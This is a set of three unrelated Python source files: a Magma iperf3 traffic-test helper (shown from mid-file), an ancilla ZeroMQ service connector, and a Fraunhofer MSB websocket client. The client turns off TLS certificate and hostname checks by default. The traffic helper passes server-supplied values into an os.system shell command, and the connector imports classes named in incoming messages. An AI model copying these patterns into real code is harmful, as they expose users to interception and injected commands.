struct to be called upon and run from the S1AP tester binary.
"""
self._config_test = self._test_lib.trfgen_configure_test
self._config_test.restype = None
self._config_test.argtypes = (ctypes.c_int32, s1ap_types.struct_test)
def _setup_start_test(self):
"""Set up the call to trfgen_start_test
The function prototype is:
void trfgen_start_test(
int test_id, char *host_ip, char *bind_ip, char *host_port)
This function provides a configuration ID and bind address to the S1AP
tester for it to start a trfgen test. This function returns practically
immediately, as the iperf3 process is called on a separate fork.
"""
self._start_test = self._test_lib.trfgen_start_test
self._start_test.restype = None
self._start_test.argtypes = (
ctypes.c_int,
ctypes.c_char_p,
ctypes.c_char_p,
ctypes.c_char_p,
)
def cleanup(self):
"""Cleanup the dll loaded explicitly so the next run doesn't reuse the
same globals as ctypes LoadLibrary uses dlopen under the covers"""
# self._test_lib.dlclose(self._test_lib._handle)
if TrafficUtil.need_to_close_iperf3_server:
print("Closing all the running Iperf3 servers and forked processes")
if not self.close_running_iperf_servers():
print("Failed to stop running Iperf3 servers in TRF Server VM")
self._test_lib.cleaningAllProcessIds()
self._test_lib = None
self._data = None
def configure_test(self, is_uplink, duration, is_udp):
"""Return the test configuration index for the configurations
provided. This is the index that is in the trfgen internal state. If a
configuration is new, will attempt to create a new one in trfgen
Args:
is_uplink (bool): uplink if True, downlink if False
duration (int): test duration, in seconds
is_udp (bool): use UDP if True, TCP if False
Returns:
An int, the index of the test configuration in trfgen, a.k.a.
the test_id
Raises:
MemoryError: if return test index would exceed
s1ap_types.MAX_TEST_CFG
"""
test = s1ap_types.struct_test()
test.trfgen_type = (
s1ap_types.trfgen_type.CLIENT.value
if is_uplink
else s1ap_types.trfgen_type.SERVER.value
)
test.traffic_type = (
s1ap_types.trf_type.UDP.value
if is_udp
else s1ap_types.trf_type.TCP.value
)
test.duration = duration
test.server_timeout = duration
# First we see if this test has already been configured. If so, just
# reuse that configuration
for t in self._trfgen_tests:
if (
t.trfgen_type == test.trfgen_type
and t.traffic_type == test.traffic_type
and t.duration == test.duration
and t.server_timeout == test.server_timeout
):
return t.test_id
# Otherwise, we just create the new test
if s1ap_types.MAX_TEST_CFG >= len(self._trfgen_tests):
test.test_id = len(self._trfgen_tests)
self._trfgen_tests += (test,)
self._config_test(test.test_id, test)
return test.test_id
# If we get here, then we've reached the limit on the number of tests
# that we can configure, so send an error. Eventually, come up with an
# eviction scheme
raise MemoryError(
"Reached limit on number of configurable tests: %d"
% s1ap_types.MAX_TEST_CFG,
)
def generate_traffic_test(
self,
ips,
is_uplink=False,
duration=120,
is_udp=False,
):
"""Create a TrafficTest object for the given UE IPs and test type
Args:
ips: (list(ipaddress.ip_address)): the IP addresses of the UEs to
which to connect
is_uplink: (bool): whether to do an uplink test. Defaults to False
duration: (int): duration, in seconds, of the test. Defaults to 120
is_udp: (bool): whether to use UDP. If False, uses TCP. Defaults to
False
Returns:
A TrafficTest object, which is used to interact with the
trfgen test
"""
test_id = self.configure_test(is_uplink, duration, is_udp)
instances = tuple(
TrafficTestInstance(is_uplink, is_udp, duration, ip, 0)
for ip in ips
)
return TrafficTest(self._start_test, instances, (test_id,) * len(ips))
class TrafficTest(object):
"""Class for representing a trfgen test with which to interact
This is the class that directly interacts with the TrafficTestServer via a
socketed connection, when the test starts (i.e. the "client" for the
"server").
"""
_alias_counter = 0
_alias_lock = threading.Lock()
_iproute = pyroute2.IPRoute()
_net_iface = "eth2"
_port = 7000
_port_lock = threading.Lock()
# Remote iperf3 superserver (IP, port) tuple. Port 62462 is chosen because
# 'MAGMA' translates to 62462 on a 12-key phone pad
_remote_server = ("192.168.60.144", 62462)
def __init__(self, test_runner, instances, test_ids):
"""Create a new TrafficTest object for running the test instance(s)
with the associated test_ids
Ports will be assigned when the test is run by communicating with the
test server responsible for iperf3 test servers
Args:
test_runner: the ctypes hook into the traffic gen trfgen_start_test
function
instances: (list(TrafficTestInstance)): the instances to run
test_ids: (list(int)): the associated trfgen test configuration
indices; must be the same length as instances
"""
assert len(instances) == len(test_ids)
self._done = threading.Event()
self._instances = tuple(instances)
self._results = None # Cached list(iperf3.TestResult) objects
self._runner = test_runner
self._test_ids = tuple(test_ids)
self._test_lock = threading.RLock() # Provide mutex between tests
self.is_trf_server_connection_refused = False
def __enter__(self):
"""Start execution of the test"""
self.start()
return self
def __exit__(self, *_):
"""Wait for test to end"""
self.wait()
@staticmethod
def _get_port():
"""Return the next port for testing"""
with TrafficTest._port_lock:
TrafficTest._port += 1
return TrafficTest._port
@staticmethod
def _iface_up(ip):
"""Brings up an iface for the given IP
Args:
ip (ipaddress.ip_address): the IP address to use for bringing up
the iface
Returns:
The iface name with alias that was brought up
"""
# Generate a unique alias
with TrafficTest._alias_lock:
TrafficTest._alias_counter += 1
net_iface = TrafficTest._net_iface
alias = TrafficTest._alias_counter
net_alias = "%s:UE%d" % (net_iface, alias)
# Bring up the iface alias
net_iface_index = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)[0]
TrafficTest._iproute.addr(
"add",
index=net_iface_index,
label=net_alias,
address=ip.exploded,
)
return net_alias
@staticmethod
def _network_from_ip(ip, mask_len):
"""Return the ipaddress.ip_network with the given mask that contains
the given IP address
Args:
ip (ipaddress.ip_address): the IP address for which we want to find
the network
mask_len (int): the number of bits to mask
Returns:
An ipaddress.ip_network; works agnostic to IPv4 or IPv6
"""
# Convert to int to make bit shifting easier
ip_int = int.from_bytes(ip.packed, "big") # Packed is big-endian
ip_masked = ipaddress.ip_address(ip_int >> mask_len << mask_len)
# Compute the appropriate prefix length
prefix_len = ip.max_prefixlen - mask_len
return ipaddress.ip_network("%s/%d" % (ip_masked.exploded, prefix_len))
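# For example, with mask_len=8 an IPv4 address such as 192.168.129.42 maps to
# the network 192.168.129.0/24.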
def _run(self):
"""Run the traffic test
Sets up traffic test with remote traffic server and local ifaces, then
runs the runner hook into the trfgen binary and collects the results to
cache
Will block until the test ends
"""
# Create a snapshot of the test's states, in case they get changed or
# wiped in a later operation. Basically, render tests immune to later
# operations after the test has started.
with self._test_lock:
self.instances = copy.deepcopy(self._instances)
test_ids = copy.deepcopy(self._test_ids)
try:
# Set up sockets and associated streams
self.sc = socket.create_connection(self._remote_server)
self.sc_in = self.sc.makefile("rb")
self.sc_out = self.sc.makefile("wb")
self.sc.settimeout(IPERF_DATA_TIMEOUT_SEC)
# Flush all the addresses left by previous failed tests
net_iface_index = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)[0]
for instance in self.instances:
TrafficTest._iproute.flush_addr(
index=net_iface_index,
address=instance.ip.exploded,
)
# Set up network ifaces and get UL port assignments for DL
aliases = ()
for instance in self.instances:
aliases += (TrafficTest._iface_up(instance.ip),)
if not instance.is_uplink:
# Assign a local port for the downlink UE server
instance.port = TrafficTest._get_port()
# Create and send TEST message
msg = TrafficRequest(
TrafficRequestType.TEST,
payload=self.instances,
)
msg.send(self.sc_out)
# Receive SERVER message and update test instances
msg = TrafficMessage.recv(self.sc_in)
assert msg.message is TrafficResponseType.SERVER
r_id = msg.id # Remote server test identifier
server_instances = msg.payload # (TrafficServerInstance, ...)
# Locally keep references to arguments passed into trfgen
num_instances = len(self.instances)
args = [None for _ in range(num_instances)]
# Post-SERVER, pre-START logic
for i in range(num_instances):
instance = self.instances[i]
server_instance = server_instances[i]
# Add ip network route
net_iface_index = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)[0]
server_instance_network = TrafficTest._network_from_ip(
server_instance.ip,
8,
)
TrafficTest._iproute.route(
"replace",
dst=server_instance_network.exploded,
iif=net_iface_index,
oif=net_iface_index,
scope="link",
)
# Add arp table entry
os.system(
"/usr/sbin/arp -s %s %s"
% (
server_instance.ip.exploded,
server_instance.mac,
),
)
if instance.is_uplink:
# Port should be the port of the remote for uplink
instance.port = server_instance.port
else:
args[i] = self._run_test(
test_ids[i],
server_instance.ip,
instance.ip,
instance.port,
)
# Send START for the given r_id
msg = TrafficRequest(
TrafficRequestType.START,
identifier=r_id,
)
msg.send(self.sc_out)
# Wait for STARTED response
msg = TrafficMessage.recv(self.sc_in)
assert msg.message is TrafficResponseType.STARTED
assert msg.id == r_id
# Post-STARTED, pre-RESULTS logic
for i in range(num_instances):
instance = self.instances[i]
if instance.is_uplink:
args[i] = self._run_test(
test_ids[i],
server_instances[i].ip,
instance.ip,
server_instances[i].port,
)
# Wait for RESULTS message
msg = TrafficMessage.recv(self.sc_in)
assert msg.message is TrafficResponseType.RESULTS
assert msg.id == r_id
results = msg.payload
# Call cleanup to close network interfaces and open sockets
self.cleanup()
# Cache results after cleanup
with self._test_lock:
self._results = results
except ConnectionRefusedError as e:
print("Running iperf data failed. Error: " + str(e))
self.is_trf_server_connection_refused = True
except socket.timeout:
print("Running iperf data failed with timeout")
TrafficUtil.need_to_close_iperf3_server = True
self.cleanup()
except Exception as e:
print("Running iperf data failed. Error: " + str(e))
TrafficUtil.need_to_close_iperf3_server = True
self.cleanup()
finally:
# Signal that we're done
self._done.set()
def _run_test(self, test_id, host_ip, ue_ip, port):
"""Run the test at the given index by calling the test runner on the
test parameters for the instance at the given index and port
Args:
test_id (int): the trfgen configuration index to use
host_ip (ipaddress.ip_address): the remote iperf3 server's IP
address [-c, for uplink]
ue_ip (ipaddress.ip_address): the local UE's IP address to which to
bind [-B]
port (int): the UE's port (downlink) or the remote server's port
(uplink) [-p]
Returns:
The raw arguments passed into the trfgen binary, for the caller
to keep track of and avoid garbage collection
"""
args = (
test_id,
host_ip.exploded.encode(),
ue_ip.exploded.encode(),
str(port).encode(),
)
self._runner(*args)
return args
@staticmethod
def combine(test, *tests):
"""Combine TrafficTest objects to produce a single test object that
will run the parameters given in the tests all at the same time
All tests in the argument will become unrunnable, as their instances
will be stripped!
Args:
test: (TrafficTest): a test, included to force at least one test to
be passed as an argument
tests: (list(TrafficTest)): any remaining tests to combine
Returns:
A single TrafficTest that will run all the instances together
"""
runner = test._runner
tests = (test,) + tests
instances = ()
test_ids = ()
for test in tests:
with test._test_lock:
instances += test._instances
test_ids += test._test_ids
# Now disable the test from later runs
test._instances = ()
test._test_ids = ()
# Create and return the new test
return TrafficTest(runner, instances, test_ids)
@property
def results(self):
"""Return the traffic results data"""
return self._results
def start(self):
"""Start this test by spinning off runner thread"""
self._done.clear()
threading.Thread(target=self._run).start()
def verify(self):
"""Verify the results of this test
Raises:
RuntimeError: if any tests returned with an error message
"""
self.wait()
with self._test_lock:
if self.is_trf_server_connection_refused:
raise RuntimeError("Failed to connect to TRF Server")
if not isinstance(self.results, tuple):
if not self._done.is_set():
TrafficUtil.need_to_close_iperf3_server = True
self._done.set()
self.cleanup()
raise RuntimeError(
"Cached results object is not a tuple : {0}".format(
self.results,
),
)
for result in self.results:
if not isinstance(result, iperf3.TestResult):
raise RuntimeError(
"Cached results are not iperf3.TestResult objects",
)
if result.error:
TrafficUtil.need_to_close_iperf3_server = True
# iPerf dumps out-of-order packet information on stderr,
# ignore these while verifying the test results
if "OUT OF ORDER" not in result.error:
raise RuntimeError(result.error)
def wait(self):
"""Wait for this test to complete"""
self._done.wait(timeout=TRAFFIC_TEST_TIMEOUT_SEC)
def cleanup(self):
"""Cleanup sockets and network interfaces"""
# Signal to end connection
msg = TrafficRequest(TrafficRequestType.EXIT)
msg.send(self.sc_out)
# Close out network ifaces
net_iface = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)
if net_iface:
net_iface_index = net_iface[0]
# For some reason the first call to flush this address flushes all
# the addresses brought up during testing. But subsequent flushes
# do nothing if the address doesn't exist
for instance in self.instances:
TrafficTest._iproute.flush_addr(
index=net_iface_index,
address=instance.ip.exploded,
)
# Do socket cleanup
self.sc_in.close()
self.sc_out.close()
self.sc.shutdown(socket.SHUT_RDWR) # Ensures safe socket closure
self.sc.close()
|
service_connector.py
|
'''
service_connector.py
ancilla
Created by Kevin Musselman (kevin@frenzylabs.com) on 01/26/20
Copyright 2019 FrenzyLabs, LLC.
'''
import logging
import sys
import time
import zmq
import importlib
import os
import json
import struct # for packing integers
from zmq.eventloop.zmqstream import ZMQStream
import asyncio
# from multiprocessing import Process, Pipe
import multiprocessing as mp
from .response import AncillaResponse, AncillaError
from .request import Request
from .base_service import BaseService
from ..utils.service_json_encoder import ServiceJsonEncoder
from .service_process import ServiceProcess
import resource, gc, signal
global SEQ_ID
SEQ_ID = 0
class ServiceConnector():
def __init__(self, service, handler, **kwargs):
processCtx = mp.get_context('spawn')
self.service = service
self.name_identity = service.encoded_name
self.identity = service.identity #f"service{self.service.model.id}".encode('ascii')
self.loop = None
self.router_address = None
self.rpc_router = None
self.process_event_stream = None
self.requests = {}
self.ctx = zmq.Context()
self.rpc, self.child_conn = mp.Pipe()
self.p = processCtx.Process(target=ServiceProcess.start_process, args=(self.identity, self.service.model.id, self.child_conn, handler))
def start(self, *args):
print(f'Start Process {self.p}')
self.p.start()
self.setup_queue()
def stop(self, *args):
print(f'Stop Process 1')
self.rpc.send(("stop", ""))
cnt = 10
while cnt > 0:
res = self.rpc.poll(1)
if res:
tada = self.rpc.recv()
break
cnt -= 1
self.p.join(2)
# self.p.terminate()
self.p = None
print(f'Stopped Process')
if self.rpc_router:
self.rpc_router.close()
if self.process_event_stream:
self.process_event_stream.flush()
self.process_event_stream.close()
def setup_queue(self):
rpc_router = self.ctx.socket(zmq.ROUTER)
waitcnt = 100
while waitcnt > 0 and not self.is_alive():
time.sleep(0.1)
waitcnt -= 1
time.sleep(0.5)
router_address = self.get_router_address()
rpc_router.connect(router_address)
self.rpc_router = ZMQStream(rpc_router)
self.rpc_router.on_recv(self.router_message)
self.pubsub_address = self.get_pubsub_address()
process_event_stream = self.ctx.socket(zmq.SUB)
process_event_stream.connect(self.pubsub_address)
self.process_event_stream = ZMQStream(process_event_stream)
self.process_event_stream.linger = 0
self.process_event_stream.on_recv(self.on_process_event)
self.process_event_stream.setsockopt(zmq.SUBSCRIBE, b'events')
def is_alive(self, *args):
return (self.p and self.p.is_alive())
def get_router_address(self):
self.rpc.send(("router_address", ""))
(key, val) = self.rpc.recv()
self.router_address = val
return self.router_address
def get_pubsub_address(self):
self.rpc.send(("pubsub_address", ""))
(key, val) = self.rpc.recv()
self.pubsub_address = val
return self.pubsub_address
def update_model(self):
self.rpc.send(("model_updated", ""))
# (key, val) = self.rpc.recv()
# self.pubsub_address = val
# return self.pubsub_address
def on_process_event(self, msg):
# print(f"CAM PUBSUB Msg = {msg}", flush=True)
topic, identity, *res = msg
if topic.startswith(b'data'):
topic = self.service.identity + b'.' + topic
if topic.startswith(b'events.state'):
try:
newstate = json.loads(res[0].decode('utf-8'))
self.service.state.update(newstate)
except:
pass
nmsg = [topic, self.service.identity] + res
# print(f"Process evt: {nmsg}")
self.service.pusher.send_multipart(nmsg)
def router_message(self, msg):
# print(f"Router Result = {msg}", flush=True)
ident, seq, payload = msg
if seq in self.requests:
self.requests[seq].set_result(payload)
async def make_request(self, request):
global SEQ_ID
SEQ_ID += 1
seq_s = struct.pack('!q', SEQ_ID)
loop = asyncio.get_running_loop()
# Create a new Future object.
fut = loop.create_future()
self.requests[seq_s] = fut
renc = request.encode()
self.rpc_router.send_multipart([self.identity, seq_s, renc])
res = await fut
try:
del self.requests[seq_s]
res = json.loads(res.decode('utf-8'))
classname = res.get('__class__')
module_name, class_name = classname.rsplit(".", 1)
MyClass = getattr(importlib.import_module(module_name), class_name)
if hasattr(MyClass, "decode"):
res = MyClass.decode(res.get('data', {}))
else:
res = MyClass(res.get('data', {}))
except Exception as e:
print('Exception')
raise AncillaError(400, str(e))
if isinstance(res, AncillaError):
raise res
return res
|
MsbClient.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019 Fraunhofer Institute for Manufacturing Engineering and Automation (IPA)
Authors: Daniel Stock, Matthias Stoehr
Licensed under the Apache License, Version 2.0
See the file "LICENSE" for the full license governing this code.
"""
import websocket, threading, json, jsonschema, jsonpickle, ssl, time, uuid, os, logging
from random import randint
import datetime
from .Event import Event
from .ComplexDataFormat import ComplexDataFormat
from .Function import Function
from .DataFormat import getDataType
class MsbClient(websocket.WebSocketApp):
"""Definition of the msb client to handle the creation of the self-description
and communication with the msb websocket interface.
"""
def __init__(
self,
service_type=None,
uuid=None,
name=None,
description=None,
token=None,
applicationPropertiesCustomPath=None
):
"""Initializes a new msb client.
If no parameters are provided an application.properties file with the main configuration needs to be present.
Otherwise the config data can be provided as constructor parameters
Args:
service_type (str): The service type of the service ('Application' or 'SmartObject')
uuid (str): The uuid of the service as valid V4 UUID
name (str): The name of the service
description (str): The description of the service
token (str): The token of the service used to verify service via MSB GUI or Rest
Returns:
MsbClient: The msb client object to specify the service and handle MSB connection
"""
self.msb_url = ""
self.msb_url_with_wspath = ""
self.applicationPropertiesCustomPath = applicationPropertiesCustomPath
# debugging
self.debug = False
self.trace = False
self.dataFormatValidation = True
# connection params
self.connected = False
self.registered = False
self.autoReconnect = True
self.reconnecting = False
self.userDisconnect = False
self.reconnectInterval = 10
# client-side heartbeats
self.keepAlive = False
self.heartbeat_interval = 8
# sockJs framing
self.sockJsFraming = True
# event caching
self.eventCache = []
self.eventCacheEnabled = True
self.eventCacheSize = 1000
self.maxMessageSize = 1000000
# smart object definition
self.functions = {}
self.events = {}
self.configuration = {}
self.configuration["parameters"] = {}
# // socket
self.ws = None
self.hostnameVerification = False
self.threadAsDaemonEnabled = False
# check if all params are present or if the application.properties file will be used
if (service_type or uuid or name or description or token) is not None:
self.service_type = service_type
self.uuid = uuid
self.name = name
self.description = description
self.token = token
else:
self.readConfig()
# used for serialization and deserialization of complex Python objects
jsonpickle.set_encoder_options("json", sort_keys=False, indent=4)
jsonpickle.set_preferred_backend("json")
# list of all valid MSB message types
MSBMessageTypes = [
"IO",
"NIO",
"IO_CONNECTED",
"IO_REGISTERED",
"IO_PUBLISHED",
"NIO_ALREADY_CONNECTED",
"NIO_REGISTRATION_ERROR",
"NIO_UNEXPECTED_REGISTRATION_ERROR",
"NIO_UNAUTHORIZED_CONNECTION",
"NIO_EVENT_FORWARDING_ERROR",
"NIO_UNEXPECTED_EVENT_FORWARDING_ERROR",
"ping"
]
def sendBuf(self):
for msg in list(self.eventCache):  # iterate over a copy so removals do not skip entries
try:
if self.connected and self.registered:
logging.debug("SENDING (BUF): " + msg)
if self.sockJsFraming:
_msg = self.objectToJson(msg).replace("\\n", "")
self.ws.send('["E ' + _msg[1:-1] + '"]')
else:
self.ws.send("E " + msg)
self.eventCache.remove(msg)
except Exception:
pass
def on_message(self, message):
if self.sockJsFraming:
if self.debug and message.startswith("h"):
logging.debug("♥")
message = message[3:-2]
if message in self.MSBMessageTypes:
logging.info(message)
if message == "IO_CONNECTED":
if self.reconnecting:
self.reconnecting = False
if self.sockJsFraming:
_selfd = json.dumps(
self.objectToJson(self.getSelfDescription())
).replace("\\n", "")
self.ws.send('["R ' + _selfd[1:-1] + '"]')
else:
self.ws.send(
"R " + self.objectToJson(self.getSelfDescription())
)
if message == "IO_REGISTERED":
self.registered = True
if self.eventCacheEnabled:
self.connected = True
self.sendBuf()
elif message == "NIO_ALREADY_CONNECTED":
if self.connected:
try:
self.ws.close()
except Exception:
pass
elif message == "NIO_UNEXPECTED_REGISTRATION_ERROR":
if self.connected:
try:
self.ws.close()
except Exception:
pass
elif message == "NIO_UNAUTHORIZED_CONNECTION":
if self.connected:
try:
self.ws.close()
except Exception:
pass
elif message == 'ping':
if self.sockJsFraming:
self.ws.send('["pong"]')
else:
self.ws.send('pong')
if message.startswith("C"):
jmsg = message.replace('\\"', '"')
jmsg = json.loads(jmsg[2:])
logging.info(str(jmsg))
if jmsg["functionId"] not in self.functions:
if jmsg["functionId"].startswith("/") and not jmsg[
"functionId"
].startswith("//"):
jmsg["functionId"] = jmsg["functionId"][1:]
if jmsg["functionId"] in self.functions:
if "correlationId" in jmsg:
jmsg["functionParameters"]["correlationId"] = jmsg["correlationId"]
else:
logging.debug("correlationid could not be found. Does the websocket interface version support it?")
self.functions[jmsg["functionId"]].implementation(
jmsg["functionParameters"]
)
else:
logging.warning("Function could not be found: " + jmsg["functionId"])
elif message.startswith("K"):
jmsg = message.replace('\\"', '"')
jmsg = json.loads(jmsg[2:])
logging.info(str(jmsg))
logging.debug("CONFIGURATION: " + str(jmsg))
if jmsg["uuid"] == self.uuid:
for key in jmsg["params"]:
if key in self.configuration["parameters"]:
self.changeConfigParameter(key, jmsg["params"][key])
self.reRegister()
def on_error(self, error):
logging.error(error)
def on_close(self, code, reason):
logging.debug("DISCONNECTED")
logging.debug("Websocket Close Status Code: (" + str(code) + "); Reason: ("+ str(reason) + ")")
self.connected = False
self.registered = False
if self.autoReconnect and not self.userDisconnect:
logging.info(
"### closed, waiting "
+ str(self.reconnectInterval)
+ " seconds before reconnect. ###"
)
time.sleep(self.reconnectInterval)
self.reconnecting = True
logging.info("Start reconnecting to msb url: >" + self.msb_url + "<")
self.connect(self.msb_url)
def on_open(self):
logging.debug("Socket open")
self.connected = True
def enableDebug(self, debug=True):
"""Enables or disables the debug logging for the msb client.
Args:
debug (bool): Used to either enable (true) or disable (false) debug logging.
"""
if debug:
logging.basicConfig(
format="[%(asctime)s] %(module)s %(name)s.%(funcName)s"
+ " +%(lineno)s: %(levelname)-8s [%(process)d] %(message)s"
)
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.basicConfig(format="[%(asctime)s] %(message)s")
logging.getLogger().setLevel(logging.INFO)
self.debug = debug
def enableTrace(self, trace=True):
"""Enables or disables the websocket trace.
Args:
trace (bool): Used to either enable (true) or disable (false) websocket trace
"""
self.trace = trace
websocket.enableTrace(trace)
def enableDataFormatValidation(self, dataFormatValidation=True):
"""Enables or disables data format and message format validation.
(Mainly for development, can be disabled in production to improve performance)
Args:
dataFormatValidation (bool): Used to either enable (true) or disable (false) format validation
"""
self.dataFormatValidation = dataFormatValidation
def disableAutoReconnect(self, autoReconnect=True):
"""Disables or enables auto reconnect for the client if connection to MSB gets lost.
Args:
autoReconnect (bool): Used to either disable (true) or enable (false) auto reconnect
"""
self.autoReconnect = not autoReconnect
def setReconnectInterval(self, interval=10000):
"""Set the interval in ms for automatic reconnects if connection to MSB gets lost.
Args:
interval (int): The interval value in ms (>=3000) for automatic reconnections
"""
if interval <= 3000:
interval = 3000
self.reconnectInterval = interval / 1000
def setKeepAlive(self, keepAlive=True, heartbeat_interval=8000):
"""Sets the keepalive interval for the client-side heartbeat in ms for the WS connection.
This is required if there is no server-side heartbeat.
Args:
keepAlive (bool): Used to enable (true) or disable (false) the keep alive functionality
heartbeat_interval (int): Client-side heartbeat interval value in ms
"""
self.keepAlive = keepAlive
if heartbeat_interval < 8000:
heartbeat_interval = 8000
self.heartbeat_interval = heartbeat_interval / 1000
def disableSockJsFraming(self, sockJsFraming=True):
"""Disables or enables the sockJs framing.
Args:
sockJsFraming (bool): Used to either disable (true) or enable (false) sockJs framing
"""
self.sockJsFraming = not sockJsFraming
def disableHostnameVerification(self, hostnameVerification=True):
"""Disables or enables checking for self-signed SSL certificates (disable it e.g. for development)
Args:
hostnameVerification (bool): Used to either disable (true) or enable (false) ssl checks
"""
self.hostnameVerification = not hostnameVerification
def disableEventCache(self, disableEventCache=True):
"""Disables or enables the event cache, which will save sent events if no active MSB connection is present.
Args:
disableEventCache (bool): Used to either disable (true) or enable (false) event cache
"""
self.eventCacheEnabled = not disableEventCache
def setEventCacheSize(self, eventCacheSize=1000):
"""Sets the size (max number of events) of the event cahe.
If the max is reached, oldest entry gets dismissed.
Args:
eventCacheSize (int): The size of the event cache (event entries)
"""
self.eventCacheSize = eventCacheSize
def enableThreadAsDaemon(self, threadAsDaemonEnabled=True):
"""Enable the msb client thread to run as daemon.
This will run the websocket thread as daemon to be independent from the user threads.
Args:
threadAsDaemonEnabled (bool): Used to either enable (true) or disable (false) the thread to run as daemon
"""
self.threadAsDaemonEnabled = threadAsDaemonEnabled
def _checkUrl(self, msb_url=None):
"""Checks and transforms the msb url into a valid websocket format
Args:
msb_url (str): The url of the MSB (http(s)://host:port or ws(s)://host:port)
"""
server_id = str(randint(100, 999))
session_id = str(uuid.uuid4()).replace("-", "")
if msb_url is not None:
self.msb_url = msb_url
if "http://" in self.msb_url:
self.msb_url = self.msb_url.replace("http://", "ws://")
elif "https://" in self.msb_url:
self.msb_url = self.msb_url.replace("https://", "wss://")
if not (self.msb_url.startswith("ws://") or self.msb_url.startswith("wss://")):
logging.error("WRONG MSB URL FORMAT: " + str(self.msb_url))
if self.sockJsFraming:
self.msb_url_with_wspath = (
self.msb_url
+ "/websocket/data/"
+ server_id
+ "/"
+ session_id
+ "/websocket"
)
else:
self.msb_url_with_wspath = self.msb_url + "/websocket/data/websocket"
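# Illustrative example of the URL transformation above (server_id and
# session_id are random per connection, the host is a placeholder):
#   "https://msb.example.org:8084" with sockJs framing enabled becomes
#   "wss://msb.example.org:8084/websocket/data/<server_id>/<session_id>/websocket"
#   and with sockJs framing disabled becomes
#   "wss://msb.example.org:8084/websocket/data/websocket"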
def connect(self, msb_url=None):
"""Connects the client to the MSB WebSocket interface.
Args:
msb_url (str): The url of the MSB (http(s)://host:port or ws(s)://host:port)
"""
self.userDisconnect = False
# check and update the url format
self._checkUrl(msb_url)
# init the websocket app and register own listeners
ws = websocket.WebSocketApp(
self.msb_url_with_wspath,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
)
self.ws = ws
ws.on_open = self.on_open
# prepare and start socket
def runf():
try:
if not self.hostnameVerification:
if self.keepAlive:
ws.run_forever(
ping_interval=self.heartbeat_interval,
ping_timeout=self.heartbeat_interval - 5,
sslopt={
"cert_reqs": ssl.CERT_NONE,
"check_hostname": False,
},
suppress_origin=True
)
else:
ws.run_forever(
sslopt={
"cert_reqs": ssl.CERT_NONE,
"check_hostname": False,
},
suppress_origin=True
)
else:
if self.keepAlive:
ws.run_forever(
ping_interval=self.heartbeat_interval,
ping_timeout=self.heartbeat_interval - 3,
)
else:
ws.run_forever()
except Exception:
pass
logging.info("Connecting to MSB @ " + self.msb_url)
wst = threading.Thread(target=runf)
if self.threadAsDaemonEnabled:
wst.setDaemon(True)
wst.start()
def disconnect(self):
"""Disconnects the client from the MSB WebSocket interface."""
self.userDisconnect = True
logging.debug("Disconnect requested by msb client api")
self.ws.close()
def register(self):
"""Sends registration message to the MSB."""
def _sendReg():
if self.sockJsFraming:
_selfd = json.dumps(
self.objectToJson(self.getSelfDescription())
).replace("\\n", "")
_selfd = _selfd[1:-1]
self.ws.send('["R ' + _selfd + '"]')
else:
self.ws.send("R " + self.objectToJson(self.getSelfDescription()))
def _set_interval(func, sec):
def func_wrapper():
if self.connected:
func()
else:
_set_interval(func, sec)
t = threading.Timer(sec, func_wrapper)
t.start()
return t
_set_interval(_sendReg, 0.1)
def addEvent(
self,
event,
event_name=None,
event_description=None,
event_dataformat=None,
event_priority=0,
isArray=None,
):
"""Adds an event to the self-description.
Args:
event (:obj:Event, str): The event object or the event id
event_name (str): The name of the event
event_description (str): The description of the event
event_dataformat (:obj:): The data type of the event (of class DataFormat, DataType or ComplexDataFormat)
event_priority (str, int): The priority of the event (LOW,MEDIUM,HIGH) or (0,1,2)
isArray (bool): Specifies if the event handles an object array or just an object of the data
"""
# create event object by single params
if not isinstance(event, Event):
event = Event(
event,
event_name,
event_description,
event_dataformat,
event_priority,
isArray,
)
# for complex objects, update dataformat
if event.dataFormat is not None:
# if array of complex objects, change dataformat to type array
if event.isArray:
if "$ref" in event.dataFormat["dataObject"]:
event.dataFormat["dataObject"]["type"] = "array"
event.dataFormat["dataObject"]["items"] = {}
event.dataFormat["dataObject"]["items"]["$ref"] = {}
event.dataFormat["dataObject"]["items"][
"$ref"
] = event.dataFormat["dataObject"]["$ref"]
del event.dataFormat["dataObject"]["$ref"]
# if not an array of complex objects, change dataformat to type object
elif not event.isArray:
if "$ref" in event.dataFormat["dataObject"]:
event.dataFormat["dataObject"]["type"] = "object"
# logging.debug(str(event.dataFormat))
# validate data format and add event
if vadilateEventDataFormat(event.dataFormat):
event.id = len(self.events) + 1
if event.eventId not in self.events:
self.events[event.eventId] = event
else:
logging.error(
str(event.eventId) + " already in events, change event id!"
)
raise Exception("Event with this ID already present: " + str(event.eventId))
def addFunction(
self,
function,
function_name=None,
function_description=None,
function_dataformat=None,
fnpointer=None,
isArray=False,
responseEvents=None,
):
"""Adds a function to the self-description.
Args:
function (:obj:Function, str): The function object or the function id
function_name (str): The name of the function
function_description (str): The description of the function
function_dataformat (:obj:): The data type of the function (of class DataFormat or ComplexDataFormat)
fnpointer (:func:): The function implementation to be called for incoming events
isArray (bool): Specifies if the function handles an object array or just an object of the data
responseEvents (:obj: list of event ids): The list of event IDs to be sent as response events
"""
# create function object by single params
if not isinstance(function, Function):
function = Function(
function,
function_name,
function_description,
function_dataformat,
fnpointer,
isArray,
responseEvents,
)
# check if defined responseEvents are valid (exist)
if function.responseEvents is not None:
for responseEvent in function.responseEvents:
if responseEvent not in self.events:
logging.error(
"Event not found for id " + responseEvent
)
raise Exception("Event not found for id " + responseEvent)
# for complex objects, update dataformat
if function.dataFormat is not None:
# if array of complex objects, change dataformat to type array
if function.isArray:
if "$ref" in function.dataFormat["dataObject"]:
function.dataFormat["dataObject"]["type"] = "array"
function.dataFormat["dataObject"]["items"] = {}
function.dataFormat["dataObject"]["items"]["$ref"] = {}
function.dataFormat["dataObject"]["items"][
"$ref"
] = function.dataFormat["dataObject"]["$ref"]
del function.dataFormat["dataObject"]["$ref"]
# if not an array of complex objects, change dataformat to type object
elif not function.isArray:
if "$ref" in function.dataFormat["dataObject"]:
function.dataFormat["dataObject"]["type"] = "object"
# logging.debug(str(function.dataFormat))
# validate data format and add function
if vadilateFunctionDataFormat(function.dataFormat):
if function.functionId not in self.functions:
self.functions[function.functionId] = function
